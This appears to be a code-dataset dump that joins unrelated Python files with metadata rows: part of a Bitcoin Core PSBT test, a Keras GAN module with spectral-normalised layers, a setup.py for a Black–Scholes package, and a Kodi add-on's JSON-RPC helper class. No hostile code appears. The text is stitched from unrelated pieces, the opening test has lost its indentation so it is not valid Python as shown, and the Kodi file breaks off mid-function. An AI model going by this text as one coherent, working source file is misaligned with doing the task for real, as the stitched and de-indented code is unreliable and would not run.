for tx_in, psbt_in in zip(decoded_psbt["tx"]["vin"], decoded_psbt["inputs"]):
assert tx_in["sequence"] > MAX_BIP125_RBF_SEQUENCE
assert "bip32_derivs" in psbt_in
assert_equal(decoded_psbt["tx"]["locktime"], block_height)
# Same construction without optional arguments
psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}])
decoded_psbt = self.nodes[0].decodepsbt(psbtx_info["psbt"])
for tx_in in decoded_psbt["tx"]["vin"]:
assert tx_in["sequence"] > MAX_BIP125_RBF_SEQUENCE
assert_equal(decoded_psbt["tx"]["locktime"], 0)
        # Make sure that a change address from a wallet without P2SH inner-script access still results in success
# when attempting BnB coin selection
self.nodes[0].walletcreatefundedpsbt([], [{self.nodes[2].getnewaddress():unspent["amount"]+1}], block_height+2, {"changeAddress":self.nodes[1].getnewaddress()}, False)
# Regression test for 14473 (mishandling of already-signed witness transaction):
psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}])
complete_psbt = self.nodes[0].walletprocesspsbt(psbtx_info["psbt"])
double_processed_psbt = self.nodes[0].walletprocesspsbt(complete_psbt["psbt"])
assert_equal(complete_psbt, double_processed_psbt)
# We don't care about the decode result, but decoding must succeed.
self.nodes[0].decodepsbt(double_processed_psbt["psbt"])
# BIP 174 Test Vectors
# Check that unknown values are just passed through
unknown_psbt = "cHNidP8BAD8CAAAAAf//////////////////////////////////////////AAAAAAD/////AQAAAAAAAAAAA2oBAAAAAAAACg8BAgMEBQYHCAkPAQIDBAUGBwgJCgsMDQ4PAAA="
unknown_out = self.nodes[0].walletprocesspsbt(unknown_psbt)['psbt']
assert_equal(unknown_psbt, unknown_out)
# Open the data file
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/rpc_psbt.json'), encoding='utf-8') as f:
d = json.load(f)
invalids = d['invalid']
valids = d['valid']
creators = d['creator']
signers = d['signer']
combiners = d['combiner']
finalizers = d['finalizer']
extractors = d['extractor']
# Invalid PSBTs
for invalid in invalids:
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decodepsbt, invalid)
# Valid PSBTs
for valid in valids:
self.nodes[0].decodepsbt(valid)
# Creator Tests
for creator in creators:
created_tx = self.nodes[0].createpsbt(creator['inputs'], creator['outputs'])
assert_equal(created_tx, creator['result'])
# Signer tests
for i, signer in enumerate(signers):
self.nodes[2].createwallet("wallet{}".format(i))
wrpc = self.nodes[2].get_wallet_rpc("wallet{}".format(i))
for key in signer['privkeys']:
wrpc.importprivkey(key)
signed_tx = wrpc.walletprocesspsbt(signer['psbt'])['psbt']
assert_equal(signed_tx, signer['result'])
# Combiner test
for combiner in combiners:
combined = self.nodes[2].combinepsbt(combiner['combine'])
assert_equal(combined, combiner['result'])
# Finalizer test
for finalizer in finalizers:
finalized = self.nodes[2].finalizepsbt(finalizer['finalize'], False)['psbt']
assert_equal(finalized, finalizer['result'])
# Extractor test
for extractor in extractors:
extracted = self.nodes[2].finalizepsbt(extractor['extract'], True)['hex']
assert_equal(extracted, extractor['result'])
# Unload extra wallets
for i, signer in enumerate(signers):
self.nodes[2].unloadwallet("wallet{}".format(i))
self.test_utxo_conversion()
# Test that psbts with p2pkh outputs are created properly
p2pkh = self.nodes[0].getnewaddress(address_type='legacy')
psbt = self.nodes[1].walletcreatefundedpsbt([], [{p2pkh : 1}], 0, {"includeWatching" : True}, True)
self.nodes[0].decodepsbt(psbt['psbt'])
if __name__ == '__main__':
PSBTTest().main()
| 50.768977
| 209
| 0.655789
|
9e6df957fca4ca661644d0467f850d3861af902d
| 21,575
|
py
|
Python
|
soph/nn/nn.py
|
artificialsoph/soph.py
|
58ae497f71bb48ecba7bcb8771f64112fdc9f3fb
|
[
"MIT"
] | null | null | null |
soph/nn/nn.py
|
artificialsoph/soph.py
|
58ae497f71bb48ecba7bcb8771f64112fdc9f3fb
|
[
"MIT"
] | null | null | null |
soph/nn/nn.py
|
artificialsoph/soph.py
|
58ae497f71bb48ecba7bcb8771f64112fdc9f3fb
|
[
"MIT"
] | null | null | null |
import keras
import numpy as np
from keras import backend as K
# epsilon set according to BIGGAN https://arxiv.org/pdf/1809.11096.pdf
def _l2normalizer(v, epsilon=1e-4):
return v / (K.sum(v**2)**0.5 + epsilon)
def power_iteration(W, u, rounds=1):
'''
    According to the paper, we only need to do power iteration one time.
'''
_u = u
for i in range(rounds):
_v = _l2normalizer(K.dot(_u, W))
_u = _l2normalizer(K.dot(_v, K.transpose(W)))
W_sn = K.sum(K.dot(_u, W) * _v)
return W_sn, _u, _v
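# Illustrative sketch (not part of the original file): estimating the spectral
# norm of a small matrix, keeping a persistent estimate u of the first left
# singular vector, as the layers below do for their reshaped kernels.
#   W = K.variable(np.random.randn(3, 5))
#   u = K.variable(np.random.randn(1, 3))
#   sigma, u_new, v_new = power_iteration(W, u, rounds=1)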
class Conv2D(keras.layers.Conv2D):
def __init__(self, filters, spectral_normalization=False, **kwargs):
self.spectral_normalization = spectral_normalization
super(Conv2D, self).__init__(filters, **kwargs)
def build(self, input_shape):
        # Create a persistent, non-trainable weight variable u for power iteration.
self.u = self.add_weight(name='u', shape=(1, self.filters),
initializer='uniform', trainable=False)
# self.kernel = self.add_weight(name='kernel',
# shape=(input_shape[1], self.output_dim),
# initializer='uniform',
# trainable=True)
super(Conv2D, self).build(input_shape)
# Be sure to call this at the end
def compute_spectral_normal(self, training=True):
# Spectrally Normalized Weight
if self.spectral_normalization:
# Get kernel tensor shape [kernel_h, kernel_w, in_channels, out_channels]
W_shape = self.kernel.shape.as_list()
# Flatten the Tensor
# [out_channels, N]
W_mat = K.reshape(self.kernel, [W_shape[-1], -1])
W_sn, u, v = power_iteration(W_mat, self.u)
if training:
# Update estimated 1st singular vector
self.u.assign(u)
return self.kernel / W_sn
else:
return self.kernel
def call(self, inputs, training=None):
outputs = K.conv2d(inputs,
self.compute_spectral_normal(training=training),
strides=self.strides, padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate)
if self.use_bias:
outputs = K.bias_add(outputs, self.bias,
data_format=self.data_format)
if self.activation is not None:
return self.activation(outputs)
return outputs
def compute_output_shape(self, input_shape):
return super(Conv2D, self).compute_output_shape(input_shape)
class Conv2DTranspose(keras.layers.Conv2DTranspose):
def __init__(self, spectral_normalization=False, **kwargs):
self.spectral_normalization = spectral_normalization
super(Conv2DTranspose, self).__init__(**kwargs)
def build(self, input_shape):
        # Create a persistent, non-trainable weight variable u for power iteration.
self.u = self.add_weight(name='u', shape=(1, self.filters),
initializer='uniform', trainable=False)
# self.kernel = self.add_weight(name='kernel',
# shape=(input_shape[1], self.output_dim),
# initializer='uniform',
# trainable=True)
super(Conv2DTranspose, self).build(input_shape)
# Be sure to call this at the end
def compute_spectral_normal(self, training=True):
# Spectrally Normalized Weight
if self.spectral_normalization:
# Get kernel tensor shape [kernel_h, kernel_w, in_channels, out_channels]
W_shape = self.kernel.shape.as_list()
# Flatten the Tensor
# [out_channels, N]
W_mat = K.reshape(self.kernel, [W_shape[-2], -1])
W_sn, u, v = power_iteration(W_mat, self.u)
if training:
# Update estimated 1st singular vector
self.u.assign(u)
return self.kernel / W_sn
else:
return self.kernel
def call(self, inputs, training=None):
input_shape = K.shape(inputs)
batch_size = input_shape[0]
if self.data_format == 'channels_first':
h_axis, w_axis = 2, 3
else:
h_axis, w_axis = 1, 2
height, width = input_shape[h_axis], input_shape[w_axis]
kernel_h, kernel_w = self.kernel_size
stride_h, stride_w = self.strides
# Infer the dynamic output shape:
out_height = keras.utils.conv_utils.deconv_length(
height, stride_h, kernel_h, self.padding)
out_width = keras.utils.conv_utils.deconv_length(
width, stride_w, kernel_w, self.padding)
if self.data_format == 'channels_first':
output_shape = (batch_size, self.filters, out_height, out_width)
else:
output_shape = (batch_size, out_height, out_width, self.filters)
outputs = K.conv2d_transpose(
inputs,
self.compute_spectral_normal(training=training),
output_shape,
self.strides,
padding=self.padding,
data_format=self.data_format,
# dilation_rate=self.dilation_rate
)
if self.use_bias:
outputs = K.bias_add(outputs, self.bias,
data_format=self.data_format)
if self.activation is not None:
return self.activation(outputs)
return outputs
def compute_output_shape(self, input_shape):
return super(Conv2DTranspose, self).compute_output_shape(input_shape)
def act_layer(activation, name=None):
if name is None:
name = activation
if activation == "lrelu":
return keras.layers.LeakyReLU(.1, name=name)
else:
return keras.layers.Activation(activation, name=name)
def batch_norm():
return keras.layers.BatchNormalization(momentum=0.9, epsilon=0.00002)
def build_discriminator(
n_pixels=32,
alpha=2,
filter_dim=64,
activation="relu",
batch_normalization=False,
spectral_normalization=False,
initializer="glorot_uniform",
use_bias=True,
pooling="avg",
name="Discriminator",
):
# notes:
# - don't use spectral norm and batch norm (see https://github.com/AlexiaJM/RelativisticGAN/blob/master/code/GAN_losses_iter.py)
start_pow = np.log2(n_pixels) - 3
img = keras.Input(shape=(n_pixels, n_pixels, 3))
conv_block = img
n_blocks = int(start_pow + 1)
for i in range(n_blocks):
n_filters = int(filter_dim * (alpha**i))
# conv_block = Conv2D(
# n_filters,
# spectral_normalization=spectral_normalization,
# kernel_initializer=initializer,
# kernel_size=3,
# strides=1,
# padding="same",
# use_bias=use_bias,
# name=f"D{i}-k3s1-s{spectral_normalization}",
# )(conv_block)
#
# if batch_normalization:
# conv_block = batch_norm()(conv_block)
#
# conv_block = act_layer(
# activation, name=f"D{i}.1-{activation}")(conv_block)
conv_block = Conv2D(
n_filters,
spectral_normalization=spectral_normalization,
kernel_initializer=initializer,
kernel_size=4,
strides=2,
padding="same",
use_bias=use_bias,
name=f"D{i}-k4s2-s{spectral_normalization}",
)(conv_block)
if batch_normalization:
conv_block = batch_norm()(conv_block)
conv_block = act_layer(activation,
name=f"D{i}.2-{activation}")(conv_block)
conv_block = Conv2D(
int(filter_dim * (alpha**n_blocks)),
spectral_normalization=spectral_normalization,
kernel_initializer=initializer,
kernel_size=3,
strides=1,
padding="same",
use_bias=use_bias,
name=f"D{n_blocks}-k3s1-s{spectral_normalization}",
)(conv_block)
if batch_normalization:
conv_block = batch_norm()(conv_block)
conv_block = act_layer(activation,
name=f"D{n_blocks}.1-{activation}")(conv_block)
if pooling == "avg":
h = keras.layers.GlobalAveragePooling2D()(conv_block)
else:
h = keras.layers.Flatten()(conv_block)
class_block = keras.layers.Dense(1, kernel_initializer=initializer)(h)
# class_block = act_layer(
# "sigmoid", name=f"Do-sigmoid")(class_block)
return keras.Model(img, class_block, name="Discriminator")
def build_generator(
n_pixels=32,
latent_dim=128,
alpha=2,
filter_dim=64,
kernel_size=3,
activation="relu",
batch_normalization=False,
spectral_normalization=False,
initializer="glorot_uniform",
use_bias=True,
upsample=True,
name="Generator",
):
start_pow = np.log2(n_pixels) - 2
noise_input = keras.Input(shape=(latent_dim, ))
noise_block = keras.layers.Dense(
int(filter_dim * (alpha**start_pow)) * 4 * 4, input_dim=latent_dim,
kernel_initializer=initializer, name=f"G-dense")(noise_input)
# noise_block = act_layer(activation, name=f"G.d-{activation}")(noise_block)
noise_block = keras.layers.Reshape(
(4, 4, int(filter_dim * (alpha**start_pow))))(noise_block)
# if batch_normalization:
# noise_block = batch_norm()(noise_block)
up_conv_block = noise_block
n_blocks = int(start_pow)
for i in range(1, n_blocks + 1):
up_conv_block = Conv2DTranspose(
int((alpha**(start_pow - i)) * filter_dim),
spectral_normalization=spectral_normalization,
kernel_initializer=initializer, kernel_size=4, strides=2,
padding="same", use_bias=use_bias,
name=f"G{i}-k4s2-s{spectral_normalization}")(up_conv_block)
if batch_normalization:
up_conv_block = batch_norm()(up_conv_block)
up_conv_block = act_layer(activation,
name=f"G{i}-{activation}")(up_conv_block)
up_conv_block = Conv2D(
3, spectral_normalization=spectral_normalization,
kernel_initializer=initializer, kernel_size=3, strides=1,
padding="same", use_bias=use_bias,
name=f"Go-k3s1-s{spectral_normalization}")(up_conv_block)
up_conv_block = act_layer("tanh", name=f"Go-tanh")(up_conv_block)
return keras.Model(noise_input, up_conv_block, name=name)
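# Illustrative usage sketch (not part of the original file):
#   G = build_generator(n_pixels=32, latent_dim=128, spectral_normalization=True)
#   D = build_discriminator(n_pixels=32, spectral_normalization=True)
#   fake = G.predict(np.random.normal(size=(4, 128)))  # shape (4, 32, 32, 3)
#   scores = D.predict(fake)                           # shape (4, 1)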
| 33.294753
| 132
| 0.59657
|
1fb41778c38b42f7717bc134f22b3909f0fff559
| 630
|
py
|
Python
|
setup.py
|
jwg4/bsm_model
|
9699b594d20ae3faf260e444f648e2fcc7a402dd
|
[
"MIT"
] | null | null | null |
setup.py
|
jwg4/bsm_model
|
9699b594d20ae3faf260e444f648e2fcc7a402dd
|
[
"MIT"
] | null | null | null |
setup.py
|
jwg4/bsm_model
|
9699b594d20ae3faf260e444f648e2fcc7a402dd
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
setup(name='bsm_model',
version='0.2',
description='The Black–Scholes–Merton Model calculator in Python.',
long_description='The Black–Scholes–Merton Model calculator in Python.',
long_description_content_type='text/markdown',
url='https://github.com/leopoldsw/bsm_model/',
download_url = 'https://github.com/leopoldsw/bsm_model/archive/v0.2.tar.gz',
author='Leopold W.',
author_email='lsw@lwco.com',
packages=find_packages(exclude=("tests", "tests_dev")),
install_requires=['pandas', 'numpy', 'scipy', 'datetime'],
)
| 39.375
| 82
| 0.687302
|
5adc6532da255dc091cfa185e66dffe8d43c25a3
| 36,300
|
py
|
Python
|
lib/helpers/kodidb.py
|
semool/script.module.metadatautils
|
748880e4da557a6da0e51e9a962f9fefb5fcc5c5
|
[
"Apache-2.0"
] | null | null | null |
lib/helpers/kodidb.py
|
semool/script.module.metadatautils
|
748880e4da557a6da0e51e9a962f9fefb5fcc5c5
|
[
"Apache-2.0"
] | null | null | null |
lib/helpers/kodidb.py
|
semool/script.module.metadatautils
|
748880e4da557a6da0e51e9a962f9fefb5fcc5c5
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""get metadata from the kodi DB"""
import os, sys
import xbmc
import xbmcgui
import xbmcvfs
from .utils import json, try_encode, log_msg, log_exception, get_clean_image, KODI_VERSION
from .utils import try_parse_int, localdate_from_utc_string, localized_date_time
from .kodi_constants import *
from operator import itemgetter
import arrow
import datetime
class KodiDb(object):
"""various methods and helpers to get data from kodi json api"""
def __init__(self, simplecache=None):
        '''Initialize - optionally provide simplecache object'''
if not simplecache:
from simplecache import SimpleCache
self.cache = SimpleCache()
else:
self.cache = simplecache
def movie(self, db_id):
"""get moviedetails from kodi db"""
return self.get_json("VideoLibrary.GetMovieDetails", returntype="moviedetails",
fields=FIELDS_MOVIES, optparam=("movieid", try_parse_int(db_id)))
def movies(self, sort=None, filters=None, limits=None, filtertype=None):
"""get moviedetails from kodi db"""
return self.get_json("VideoLibrary.GetMovies", sort=sort, filters=filters,
fields=FIELDS_MOVIES, limits=limits, returntype="movies", filtertype=filtertype)
def movie_by_imdbid(self, imdb_id):
"""gets a movie from kodidb by imdbid."""
# apparently you can't filter on imdb so we have to do this the complicated way
if KODI_VERSION > 16:
# from Kodi 17 we have a uniqueid field instead of imdbnumber
#all_items = self.get_json('VideoLibrary.GetMovies', fields=["uniqueid"], returntype="movies")
all_items = self.cache.get("kodidb.all_movies_uniqueids")
if not all_items:
all_items = self.get_json('VideoLibrary.GetMovies', fields=["uniqueid"], returntype="movies")
self.cache.set("kodidb.all_movies_uniqueids", all_items, expiration=datetime.timedelta(minutes=15))
for item in all_items:
if 'uniqueid' in item:
for item2 in list(item["uniqueid"].values()):
if item2 == imdb_id:
return self.movie(item["movieid"])
else:
all_items = self.get_json('VideoLibrary.GetMovies', fields=["imdbnumber"], returntype="movies")
for item in all_items:
if item["imdbnumber"] == imdb_id:
return self.movie(item["movieid"])
return {}
def tvshow(self, db_id):
"""get tvshow from kodi db"""
tvshow = self.get_json("VideoLibrary.GetTvShowDetails", returntype="tvshowdetails",
fields=FIELDS_TVSHOWS, optparam=("tvshowid", try_parse_int(db_id)))
return self.tvshow_watchedcounts(tvshow)
def tvshows(self, sort=None, filters=None, limits=None, filtertype=None):
"""get tvshows from kodi db"""
tvshows = self.get_json("VideoLibrary.GetTvShows", sort=sort, filters=filters,
fields=FIELDS_TVSHOWS, limits=limits, returntype="tvshows", filtertype=filtertype)
# append watched counters
for tvshow in tvshows:
self.tvshow_watchedcounts(tvshow)
return tvshows
def tvshow_by_imdbid(self, imdb_id):
"""gets a tvshow from kodidb by imdbid (or tvdbid)."""
# apparently you can't filter on imdb so we have to do this the complicated way
if KODI_VERSION > 16:
# from Kodi 17 we have a uniqueid field instead of imdbnumber
all_items = self.get_json('VideoLibrary.GetTvShows', fields=["uniqueid"], returntype="tvshows")
for item in all_items:
if 'uniqueid' in item:
for item2 in list(item["uniqueid"].values()):
if item2 == imdb_id:
return self.tvshow(item["tvshowid"])
else:
# pre-kodi 17 approach
all_items = self.get_json('VideoLibrary.GetTvShows', fields=["imdbnumber"], returntype="tvshows")
for item in all_items:
if item["imdbnumber"] == imdb_id:
return self.tvshow(item["tvshowid"])
return {}
def episode(self, db_id):
"""get episode from kodi db"""
return self.get_json("VideoLibrary.GetEpisodeDetails", returntype="episodedetails",
fields=FIELDS_EPISODES, optparam=("episodeid", try_parse_int(db_id)))
def episodes(self, sort=None, filters=None, limits=None, filtertype=None, tvshowid=None, fields=FIELDS_EPISODES):
"""get episodes from kodi db"""
if tvshowid:
params = ("tvshowid", try_parse_int(tvshowid))
else:
params = None
return self.get_json("VideoLibrary.GetEpisodes", sort=sort, filters=filters, fields=fields,
limits=limits, returntype="episodes", filtertype=filtertype, optparam=params)
def musicvideo(self, db_id):
"""get musicvideo from kodi db"""
return self.get_json("VideoLibrary.GetMusicVideoDetails", returntype="musicvideodetails",
fields=FIELDS_MUSICVIDEOS, optparam=("musicvideoid", try_parse_int(db_id)))
def musicvideos(self, sort=None, filters=None, limits=None, filtertype=None):
"""get musicvideos from kodi db"""
return self.get_json("VideoLibrary.GetMusicVideos", sort=sort, filters=filters,
fields=FIELDS_MUSICVIDEOS, limits=limits, returntype="musicvideos", filtertype=filtertype)
def movieset(self, db_id, include_set_movies_fields=""):
"""get movieset from kodi db"""
if include_set_movies_fields:
optparams = [("setid", try_parse_int(db_id)), ("movies", {"properties": include_set_movies_fields})]
else:
optparams = ("setid", try_parse_int(db_id))
return self.get_json("VideoLibrary.GetMovieSetDetails", returntype="",
fields=["title", "art", "playcount"], optparam=optparams)
def moviesets(self, sort=None, limits=None, include_set_movies=False):
"""get moviesetdetails from kodi db"""
if include_set_movies:
optparam = ("movies", {"properties": FIELDS_MOVIES})
else:
optparam = None
return self.get_json("VideoLibrary.GetMovieSets", sort=sort,
fields=["title", "art", "playcount"],
limits=limits, returntype="", optparam=optparam)
def files(self, vfspath, sort=None, limits=None):
"""gets all items in a kodi vfs path"""
return self.get_json("Files.GetDirectory", returntype="", optparam=("directory", vfspath),
fields=FIELDS_FILES, sort=sort, limits=limits)
def genres(self, media_type):
"""return all genres for the given media type (movie/tvshow/musicvideo)"""
return self.get_json("VideoLibrary.GetGenres", fields=["thumbnail", "title"],
returntype="genres", optparam=("type", media_type))
def song(self, db_id):
"""get songdetails from kodi db"""
return self.get_json("AudioLibrary.GetSongDetails", returntype="songdetails",
fields=FIELDS_SONGS, optparam=("songid", try_parse_int(db_id)))
def songs(self, sort=None, filters=None, limits=None, filtertype=None):
"""get songs from kodi db"""
return self.get_json("AudioLibrary.GetSongs", sort=sort, filters=filters,
fields=FIELDS_SONGS, limits=limits, returntype="songs", filtertype=filtertype)
def album(self, db_id):
"""get albumdetails from kodi db"""
album = self.get_json("AudioLibrary.GetAlbumDetails", returntype="albumdetails",
fields=FIELDS_ALBUMS, optparam=("albumid", try_parse_int(db_id)))
# override type as the kodi json api is returning the album type instead of mediatype
album["type"] = "album"
return album
def albums(self, sort=None, filters=None, limits=None, filtertype=None):
"""get albums from kodi db"""
albums = self.get_json("AudioLibrary.GetAlbums", sort=sort, filters=filters,
fields=FIELDS_ALBUMS, limits=limits, returntype="albums", filtertype=filtertype)
# override type as the kodi json api is returning the album type instead of mediatype
for album in albums:
album["type"] = "album"
return albums
def artist(self, db_id):
"""get artistdetails from kodi db"""
return self.get_json("AudioLibrary.GetArtistDetails", returntype="artistdetails",
fields=FIELDS_ARTISTS, optparam=("artistid", try_parse_int(db_id)))
def artists(self, sort=None, filters=None, limits=None, filtertype=None):
"""get artists from kodi db"""
return self.get_json("AudioLibrary.GetArtists", sort=sort, filters=filters,
fields=FIELDS_ARTISTS, limits=limits, returntype="artists", filtertype=filtertype)
def recording(self, db_id):
"""get pvr recording from kodi db"""
return self.get_json("PVR.GetRecordingDetails", returntype="recordingdetails",
fields=FIELDS_RECORDINGS, optparam=("recordingid", try_parse_int(db_id)))
def recordings(self, limits=None):
"""get pvr recordings from kodi db"""
return self.get_json("PVR.GetRecordings", fields=FIELDS_RECORDINGS, limits=limits, returntype="recordings")
def channel(self, db_id):
"""get pvr channel from kodi db"""
return self.get_json("PVR.GetChannelDetails", returntype="channeldetails",
fields=FIELDS_CHANNELS, optparam=("channelid", try_parse_int(db_id)))
def channels(self, limits=None, channelgroupid="alltv"):
"""get pvr channels from kodi db"""
return self.get_json("PVR.GetChannels", fields=FIELDS_CHANNELS, limits=limits,
returntype="channels", optparam=("channelgroupid", channelgroupid))
def channelgroups(self, limits=None, channeltype="tv"):
"""get pvr channelgroups from kodi db"""
return self.get_json("PVR.GetChannelGroups", fields=[], limits=limits,
returntype="channelgroups", optparam=("channeltype", channeltype))
def timers(self, limits=None):
"""get pvr recordings from kodi db"""
fields = ["title", "endtime", "starttime", "channelid", "summary", "file"]
return self.get_json("PVR.GetTimers", fields=fields, limits=limits, returntype="timers")
def favourites(self):
"""get kodi favourites"""
items = self.get_favourites_from_file()
if not items:
fields = ["path", "thumbnail", "window", "windowparameter"]
optparams = ("type", None)
items = self.get_json("Favourites.GetFavourites", fields=fields, optparam=optparams)
return items
def castmedia(self, actorname):
"""helper to display all media (movies/shows) for a specific actor"""
# use db counts as simple checksum
filters = [{"operator": "contains", "field": "actor", "value": actorname}]
all_items = self.movies(filters=filters)
for item in self.tvshows(filters=filters):
item["file"] = "videodb://tvshows/titles/%s" % item["tvshowid"]
item["isFolder"] = True
all_items.append(item)
return all_items
def actors(self):
"""return all actors"""
all_items = []
all_actors = []
result = self.files("videodb://movies/actors")
result += self.files("videodb://tvshows/actors")
for item in result:
if not item["label"] in all_actors:
all_actors.append(item["label"])
item["type"] = "actor"
item["isFolder"] = True
if not item["art"].get("thumb"):
item["art"]["thumb"] = "DefaultActor.png"
all_items.append(item)
return sorted(all_items, key=itemgetter("label"))
@staticmethod
def set_json(jsonmethod, params):
"""method to set info in the kodi json api"""
kodi_json = {}
kodi_json["jsonrpc"] = "2.0"
kodi_json["method"] = jsonmethod
kodi_json["params"] = params
kodi_json["id"] = 1
json_response = xbmc.executeJSONRPC(try_encode(json.dumps(kodi_json)))
if sys.version_info.major == 3:
return json.loads(json_response)
else:
return json.loads(json_response.decode('utf-8', 'replace'))
@staticmethod
def get_json(jsonmethod, sort=None, filters=None, fields=None, limits=None,
returntype=None, optparam=None, filtertype=None):
"""method to get details from the kodi json api"""
kodi_json = {}
kodi_json["jsonrpc"] = "2.0"
kodi_json["method"] = jsonmethod
kodi_json["params"] = {}
if optparam:
if isinstance(optparam, list):
for param in optparam:
kodi_json["params"][param[0]] = param[1]
else:
kodi_json["params"][optparam[0]] = optparam[1]
kodi_json["id"] = 1
if sort:
kodi_json["params"]["sort"] = sort
if filters:
if not filtertype:
filtertype = "and"
if len(filters) > 1:
kodi_json["params"]["filter"] = {filtertype: filters}
else:
kodi_json["params"]["filter"] = filters[0]
if fields:
kodi_json["params"]["properties"] = fields
if limits:
kodi_json["params"]["limits"] = {"start": limits[0], "end": limits[1]}
json_response = xbmc.executeJSONRPC(try_encode(json.dumps(kodi_json)))
if sys.version_info.major == 3:
json_object = json.loads(json_response)
else:
json_object = json.loads(json_response.decode('utf-8', 'replace'))
# set the default returntype to prevent errors
if "details" in jsonmethod.lower():
result = {}
else:
result = []
if 'result' in json_object:
if returntype and returntype in json_object['result']:
# returntype specified, return immediately
result = json_object['result'][returntype]
else:
# no returntype specified, we'll have to look for it
for key, value in list(json_object['result'].items()):
if not key == "limits" and (isinstance(value, list) or isinstance(value, dict)):
result = value
else:
log_msg(json_response)
log_msg(kodi_json)
return result
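    # Illustrative note (not part of the original file): a call such as
    #   KodiDb().movies(limits=(0, 25))
    # executes a JSON-RPC payload roughly like
    #   {"jsonrpc": "2.0", "id": 1, "method": "VideoLibrary.GetMovies",
    #    "params": {"properties": FIELDS_MOVIES, "limits": {"start": 0, "end": 25}}}
    # and returns the "movies" list from the response.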
@staticmethod
def get_favourites_from_file():
"""json method for favourites doesn't return all items (such as android apps) so retrieve them from file"""
allfavourites = []
try:
from xml.dom.minidom import parse
if sys.version_info.major == 3:
favourites_path = xbmcvfs.translatePath('special://profile/favourites.xml')
else:
favourites_path = xbmc.translatePath('special://profile/favourites.xml').decode("utf-8")
if xbmcvfs.exists(favourites_path):
doc = parse(favourites_path)
result = doc.documentElement.getElementsByTagName('favourite')
for fav in result:
action = fav.childNodes[0].nodeValue
action = action.replace('"', '')
label = fav.attributes['name'].nodeValue
try:
thumb = fav.attributes['thumb'].nodeValue
except Exception:
thumb = ""
window = ""
windowparameter = ""
action_type = "unknown"
if action.startswith("StartAndroidActivity"):
action_type = "androidapp"
elif action.startswith("ActivateWindow"):
action_type = "window"
actionparts = action.replace("ActivateWindow(", "").replace(",return)", "").split(",")
window = actionparts[0]
if len(actionparts) > 1:
windowparameter = actionparts[1]
elif action.startswith("PlayMedia"):
action_type = "media"
action = action.replace("PlayMedia(", "")[:-1]
allfavourites.append({"label": label, "path": action, "thumbnail": thumb, "window": window,
"windowparameter": windowparameter, "type": action_type})
except Exception as exc:
log_exception(__name__, exc)
return allfavourites
@staticmethod
def create_listitem(item, as_tuple=True, offscreen=True):
"""helper to create a kodi listitem from kodi compatible dict with mediainfo"""
try:
if KODI_VERSION > 17:
liz = xbmcgui.ListItem(
label=item.get("label", ""),
label2=item.get("label2", ""),
path=item['file'],
offscreen=offscreen)
else:
liz = xbmcgui.ListItem(
label=item.get("label", ""),
label2=item.get("label2", ""),
path=item['file'])
# only set isPlayable prop if really needed
if item.get("isFolder", False):
liz.setProperty('IsPlayable', 'false')
elif "plugin://script.skin.helper" not in item['file']:
liz.setProperty('IsPlayable', 'true')
nodetype = "Video"
if item["type"] in ["song", "album", "artist"]:
nodetype = "Music"
# extra properties
for key, value in list(item["extraproperties"].items()):
liz.setProperty(key, value)
# video infolabels
if nodetype == "Video":
infolabels = {
"title": item.get("title"),
"size": item.get("size"),
"genre": item.get("genre"),
"year": item.get("year"),
"top250": item.get("top250"),
"tracknumber": item.get("tracknumber"),
"rating": item.get("rating"),
"playcount": item.get("playcount"),
"overlay": item.get("overlay"),
"cast": item.get("cast"),
"castandrole": item.get("castandrole"),
"director": item.get("director"),
"mpaa": item.get("mpaa"),
"plot": item.get("plot"),
"plotoutline": item.get("plotoutline"),
"originaltitle": item.get("originaltitle"),
"sorttitle": item.get("sorttitle"),
"duration": item.get("duration"),
"studio": item.get("studio"),
"tagline": item.get("tagline"),
"writer": item.get("writer"),
"tvshowtitle": item.get("tvshowtitle"),
"premiered": item.get("premiered"),
"status": item.get("status"),
"code": item.get("imdbnumber"),
"imdbnumber": item.get("imdbnumber"),
"aired": item.get("aired"),
"credits": item.get("credits"),
"album": item.get("album"),
"artist": item.get("artist"),
"votes": item.get("votes"),
"trailer": item.get("trailer")
}
#ERROR: NEWADDON Unknown Video Info Key "progress" in Kodi 19 ?!
if KODI_VERSION < 18:
infolabels["progress"] = item.get('progresspercentage')
if item["type"] == "episode":
infolabels["season"] = item["season"]
infolabels["episode"] = item["episode"]
# streamdetails
if item.get("streamdetails"):
liz.addStreamInfo("video", item["streamdetails"].get("video", {}))
liz.addStreamInfo("audio", item["streamdetails"].get("audio", {}))
liz.addStreamInfo("subtitle", item["streamdetails"].get("subtitle", {}))
if "dateadded" in item:
infolabels["dateadded"] = item["dateadded"]
if "date" in item:
infolabels["date"] = item["date"]
# music infolabels
else:
infolabels = {
"title": item.get("title"),
"size": item.get("size"),
"genre": item.get("genre"),
"year": item.get("year"),
"tracknumber": item.get("track"),
"album": item.get("album"),
"artist": " / ".join(item.get('artist')),
"rating": str(item.get("rating", 0)),
"lyrics": item.get("lyrics"),
"playcount": item.get("playcount")
}
if "date" in item:
infolabels["date"] = item["date"]
if "duration" in item:
infolabels["duration"] = item["duration"]
if "lastplayed" in item:
infolabels["lastplayed"] = item["lastplayed"]
# setting the dbtype and dbid is supported from kodi krypton and up
if KODI_VERSION > 16 and item["type"] not in ["recording", "channel", "favourite", "genre", "categorie"]:
infolabels["mediatype"] = item["type"]
# setting the dbid on music items is not supported ?
if nodetype == "Video" and "DBID" in item["extraproperties"]:
infolabels["dbid"] = item["extraproperties"]["DBID"]
if "lastplayed" in item:
infolabels["lastplayed"] = item["lastplayed"]
# assign the infolabels
liz.setInfo(type=nodetype, infoLabels=infolabels)
# artwork
liz.setArt(item.get("art", {}))
if KODI_VERSION > 17:
if "icon" in item:
liz.setArt({"icon":item['icon']})
if "thumbnail" in item:
liz.setArt({"thumb":item['thumbnail']})
else:
if "icon" in item:
liz.setIconImage(item['icon'])
if "thumbnail" in item:
liz.setThumbnailImage(item['thumbnail'])
# contextmenu
if item["type"] in ["episode", "season"] and "season" in item and "tvshowid" in item:
# add series and season level to widgets
if "contextmenu" not in item:
